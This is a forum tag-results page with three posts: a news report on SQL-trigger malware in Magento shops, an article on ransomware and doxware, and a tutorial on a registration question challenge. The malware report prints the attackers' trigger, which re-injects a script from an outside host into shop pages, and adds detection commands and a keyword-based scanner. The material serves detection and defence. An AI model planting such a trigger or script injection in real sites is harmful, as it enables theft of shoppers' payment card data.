Search the Community
Showing results for tags 'security'.
Found 3 results
-
Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware that is targeting websites running the Magento eCommerce platform. The novelty is that this is the first malware that hides its code in the website’s database and is completely written in SQL.

The malware is triggered every time a user places a new order; the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researcher Willem de Groot, who first analyzed the SQL malware discovered by Jeroen Boersma, explained that this is a significant evolution in the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database, searching for suspicious SQL triggers such as those containing admin, .js, script or < (html tags).

    echo 'SHOW TRIGGERS' | n98-magerun db:console

Once the malicious trigger has been discovered, it is possible to delete it with a command like the following one:

    echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks start with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

Below is the pattern discovered by Jeroen Boersma:

    TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW
    BEGIN
        UPDATE core_config_data
        SET value = IF(
            value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
            value,
            CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
        )
        WHERE path='design/head/includes'
            OR path='design/footer/absolute_footer'
            OR path='design/footer/copyright';\
        UPDATE cms_block
        SET content= IF(
            content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
            content,
            CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
        );
    END;

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
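The trigger inspection described in the post above, automated as an added example (not code from the post, from de Groot's Malware Scanner, or from Magereport): it reads tab-separated `SHOW TRIGGERS` output and flags trigger bodies that contain the indicators the post names. The sample rows, the `example.invalid` URL, the tab-separated input format and the extra check for writes to `core_config_data` and `cms_block` are assumptions made for illustration.

```python
import csv
import io
import sys

# Indicators named in the post: admin, .js, script, "<" (HTML tags).
INDICATORS = ("admin", ".js", "script", "<")
# Assumption: tables the posted trigger pattern writes to; writes there are flagged too.
CONTENT_TABLES = ("core_config_data", "cms_block")


def scan_triggers(tsv_text):
    """Return [(trigger, table, [reasons])] for suspicious rows of SHOW TRIGGERS output."""
    findings = []
    # QUOTE_NONE: trigger bodies contain quote characters that must be read literally.
    rows = csv.DictReader(io.StringIO(tsv_text), delimiter="\t", quoting=csv.QUOTE_NONE)
    for row in rows:
        body = (row.get("Statement") or "").lower()
        reasons = [f"contains {i!r}" for i in INDICATORS if i in body]
        reasons += [f"writes to {t}" for t in CONTENT_TABLES if f"update {t}" in body]
        if reasons:
            findings.append((row["Trigger"], row["Table"], reasons))
    return findings


# Constructed sample (not real output): one benign trigger and one shaped like
# the pattern in the post, with a placeholder URL.
SAMPLE = (
    "Trigger\tEvent\tTable\tStatement\tTiming\n"
    "trg_stock_audit\tUPDATE\tcataloginventory_stock_item\t"
    "BEGIN INSERT INTO stock_audit VALUES (NEW.item_id, NEW.qty); END\tAFTER\n"
    "after_insert_order\tINSERT\tsales_flat_order\t"
    "BEGIN UPDATE core_config_data SET value = CONCAT(value, "
    "'<script src=\"https://example.invalid/x.js\"></script>') "
    "WHERE path='design/head/includes'; END\tAFTER\n"
)

if __name__ == "__main__":
    # Scan piped-in SHOW TRIGGERS output, or the constructed sample when run interactively.
    data = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for name, table, reasons in scan_triggers(data):
        print(f"{name} on {table}: {', '.join(reasons)}")
```

Saved under a name of your choice, the script can take the output of the `SHOW TRIGGERS` command from the post on standard input. The indicators are deliberately broad, so a legitimate trigger can match and each hit should be reviewed before anything is dropped.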
-
The evolution of extortionware
https://techtalk.gfi.com/the-evolution-of-extortionware/
Debra Littlejohn Shinder on February 7, 2017

We’ve all heard a lot about ransomware that makes data inaccessible and/or locks up the computer or device until you pay for the encryption key. Now we’re seeing a variant on that theme that some call doxware, or extortionware, that goes further and threatens to release copies of the private documents, photos, and email messages on your computer to the public if you don’t pay up. It’s just one example of how malware has evolved over the past few years and is becoming more and more aggressive.

Ransomware gets its name from the fact that it holds some or all of your files hostage and demands payment to release them. This particularly heinous type of malware has been around at least since the 1980s, when the incarnation known as AIDS appeared. Various ransomware Trojans have cropped up over the years, but really ramped up a few years ago as Bitcoin offered the opportunity for attackers to easily collect the money without going through traditional channels.

CryptoLocker is one of the best-known examples of ransomware. The original version sprang to life in 2013, distributed via a botnet and malicious email attachments. The next year, the botnet was taken down by a consortium of law enforcement agencies, software vendors, commercial security research companies and academic security research departments at several prominent universities, in Operation Tovar. Not only was the botnet dismantled, but the private keys used to encrypt victims’ files were seized and made available, so that particular story had a happy ending. Unfortunately, it was far from the end of ransomware, and new extortionist malware programs have “borrowed” the CryptoLocker name even though they aren’t technically variants of it.

Other well-known ransomware attacks include Cryptowall and Reveton for Windows, and KeRanger on Mac OS X. Then there’s a whole other category of ransomware that targets smartphone and tablet operating systems.

Extortionware goes mobile

Many people today, especially young people, rarely use desktop or even laptop computers. That doesn’t mean they’ve sworn off the Internet; to the contrary, they’re online all the time, but they do it using mobile devices. So it’s no wonder the ransomware authors have turned their attention to creating malicious code that targets those devices.

As mentioned in the introduction, there are basically two types of ransomware:

- Those that encrypt your data so you can’t view or use it, called (appropriately enough) encrypting ransomware
- Those that prevent you from logging onto the computer or device or from using one or more applications (such as your web browser), called blocking ransomware or just blockers.

Note: There is also a variety of scamware called “scareware” that doesn’t really do anything but only threatens to; this includes those email messages that tell you the FBI has found something illegal on your computer and will arrest you if you don’t send money for the “fine.”

Encrypting ransomware is the most popular on desktop operating systems, but they don’t work as well with mobile devices because the data is usually stored in the cloud instead of (or in addition to) on the device where the malware can hijack it. Thus a majority of mobile ransomware programs are blockers.

Popular mobile ransomware blockers include Small, Fusob, Pletor and Svpeng. Small and Fusob combine the “threatware” idea with screen overlays that prevent you from using the apps on your device. Mobile ransomware is often disguised as a legitimate third party app or game, installed as a “drive-by download” from questionable websites, or through links in text messages.

Doxware takes electronic extortion to a new level

Doxing is a relatively new term that refers to the public release of private information about an individual or organization. Doxware does (or threatens to do) exactly the opposite of what traditional ransomware does; instead of locking up your sensitive “docs” and making them inaccessible to you, it makes them accessible to everybody – unless you pay up.

If encrypting and blocking extortionware is analogous to hostage-taking for ransom, doxware is comparable to the blackmailer who demands money to keep your secrets quiet. For this reason, doxware is sometimes also called leakware. Doxware often targets email and word processing files. Mobile variants could release private messages, pictures or contact lists from users’ phones.

Doxware can be more effective than ransomware at invoking a positive (from the attacker’s point of view) response because victims can circumvent regular ransomware encryption by maintaining separate backups of data, or get past blockers by formatting the hard drive and doing a clean restore. However, once an attacker has information that you don’t want made public, there is little you can do to prevent that other than pay up.

The scope of the problem

Even though it’s been with us for a long time, the proliferation of extortionware has exploded over the last few years, and some have dubbed 2016 “the year of ransomware” as both the distribution and the code itself became more sophisticated and touched more and more computer and device users.

I’ve never had to deal with extortionware on my own systems (thanks in part to careful security practices and in part to good luck) but I have a number of friends and relatives from all walks of life, including a few in the IT industry, who have fallen victim to it. Both individual users and businesses are vulnerable.

An Osterman Research survey in 2016 showed that nearly half of respondents said their organizations had been the victim of a ransomware attack during the previous 12 months. CNN statistics showed $209 million paid to ransomware attackers in the first quarter of 2016, and FBI estimates indicated a likely ransomware loss of $1 billion or more for the year. In addition, the average ransomware demand increased from $294 in 2015 to $679 in 2016.

While that $679 average might not seem like much, smaller amounts extorted from individuals are balanced by much larger ransoms targeting organizations, such as the $3.4 million that cybercriminals demanded from Hollywood Presbyterian hospital in early 2016.

Protecting against extortionware

Obviously extortionware is a big threat and should be on your security radar. So how do you protect your organization from it? As you might guess, many of the recommended measures are the same used to protect against other types of malware:

- Keep your OS and applications updated and install all security patches
- Back up important files regularly to a site that is disconnected when not backing up (to prevent ransomware from also encrypting your backup files)
- Authenticate inbound email
- Implement ad blocking on web browsers since malware is often delivered through “malvertisements,” even on legitimate sites
- Disable unneeded services (CryptoLocker, for example, often targeted machines using Remote Desktop Protocol, so disabling RDP if you don’t use it helps protect against it)
- Educate users in safe computing practices and reinforce the importance on a regular basis:
  - Don’t click on links in email, texts, and on web sites you don’t trust
  - Show hidden file extensions so executables can’t be disguised as PDFs or JPGs or other more innocuous file types
  - Don’t visit questionable web sites (porn, warez, music piracy sites, hacker forums, etc.)
  - Don’t download mobile apps from untrusted sources

Several of the popular security vendors offer security suites to protect against malware, including extortionware. They also offer mobile security solutions that are designed to scan your phone or tablet and check apps against their databases of known threats, and can also warn you of websites that are infected with ransomware (or other malware).

Most experts recommend that you not pay the ransom as this encourages the criminals – and in many cases victims have paid and never received the keys, or received keys that didn’t work. Remember that criminals, by definition, are not trustworthy and are prone to not keeping their promises.

Summary

Extortionware is big business and becoming more so. Companies and other large organizations are prime targets because they’re seen as having deep pockets.
Tagged with: ransomware, extortionware (and 1 more)
-
Good evening.

Let's see how you can add a question to the registration form that the user must answer correctly in order to complete registration. This can help you fight spammers.

Go to ACP - Question & Answer Challenge and click Add New Question or Create one now.

[Image]

When you click it, you are asked to fill in 2 fields. In Question, write the question, e.g. "How much is 8+8?" Below it, in Valid answers. One per line., write the answer the user must give in order to complete registration.

It is better to add more than one option: for the question above, you may have written 16 as the answer, and the user may write it out in words as Δεκαέξι and have it marked as wrong, so you should write all the possible options. E.g.

16
δεκαέξι
Δεκαέξι
ΔΕΚΑΕΞΙ
Δεκαεξι
δεκαεξι

That way the answer is counted as correct, because quite a lot of people do not type accent marks, or may start with a lowercase letter, etc.

To do this, in the field Valid answers. One per line., write all the answers you want, one below the other, and click Edit Question.